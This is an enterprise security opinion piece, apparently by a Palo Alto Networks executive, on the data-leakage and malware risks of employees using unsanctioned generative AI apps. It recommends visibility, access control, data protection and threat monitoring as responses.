The Hidden AI Risk Lurking In Your Business

  •  

     

    By: Anand Oswal,

     

    SVP & GM of Network Security, Palo Alto Networks

     

    The adoption of unsanctioned GenAI applications can lead to a broad

    range of cybersecurity issues, from data leakage to malware. That’s

    because your company doesn't know who is using what apps, what

    sensitive information is going into them, and what’s happening to that

    information once it’s there. And because not all applications are

    built to suitable enterprise standards for security, they can also

    serve malicious links and act as entryways for attackers to infiltrate

    a company’s network—giving them access to your systems and data. All

    of these issues can lead to regulatory compliance violations,

    sensitive data exposure, IP theft, operational disruption and

    financial losses. While these apps provide enormous productivity

    potential, there are serious risks and potential consequences

    associated with their adoption if not done securely.

     

    Take for example:

     

    • Marketing teams using an unsanctioned application that uses AI to

    generate amazing image and video content. What happens if the team

    loads sensitive information into the app and the details of your

    confidential product launch leak? Not the kind of “viral” you were

    looking for.

     

    • Project managers using AI-powered note-taking apps to transcribe

    meetings and provide useful summaries. But what happens when the notes

    captured include a confidential discussion about this quarter’s

    financial results ahead of the earnings announcement?

     

    • Developers using copilots and code optimization services to build

    products faster. But what if optimized code returned from a

    compromised application includes malicious scripts?

     

    These are just a few of the ways that well-intentioned use of GenAI

    results in an unintentional increase in risk. But blocking these

    technologies may limit your organization’s ability to gain a

    competitive edge, so that isn’t the answer either. Companies can—and

    should—take the time to consider how they can empower their employees

    to use these applications securely. Here are a few considerations:

     

    Visibility: You can’t protect what you don’t know about. One of the

    biggest challenges IT teams face with unsanctioned apps is that it’s

    difficult to respond to security incidents promptly, increasing the

    potential for security breaches. Every enterprise must monitor the use

    of third-party GenAI apps and understand the specific risks associated

    with each tool. Building on the understanding of which tools are being

    used, IT teams need visibility into what data is flowing in and out of

    corporate systems. This visibility will also help detect a security

    breach so it can be identified and rectified quickly.

     

    Control: IT teams need the ability to make an informed decision on

    whether to block, allow or limit access to third-party GenAI apps, on

    either a per-application basis or leveraging risk-based or categorical

    controls. For example, you might want to block all access to code

    optimization tools for all employees but allow developers to access

    the third-party optimization tool that your information security team

    has assessed and sanctioned for internal use.

     

    Data Security: Are your teams sharing sensitive data with the apps? IT

    teams need to block sensitive data from leaking to protect your data

    against misuse and theft. This is especially important if your company

    is regulated or subject to data sovereignty laws. In practice, this

    means monitoring the data being sent to GenAI apps, and then

    leveraging technical controls to ensure that sensitive or protected

    data, such as personally identifiable information or intellectual

    property, isn’t sent to these applications.

     

    Threat prevention: The potential for exploits and vulnerabilities can

    be lurking underneath the surface of the GenAI tools being used by

    your teams. Given the incredibly fast rate at which many of these

    tools have been developed and brought to market, you often don’t know

    whether the model being used was built with corrupt models, trained on

    incorrect or malicious data, or is subject to a broad range of

    AI-specific vulnerabilities. It is a recommended best practice to

    monitor and control data flowing from the applications to your

    organization for malicious or suspicious activity.

    حمّل تطبيق Alamrakamy| عالم رقمي الآن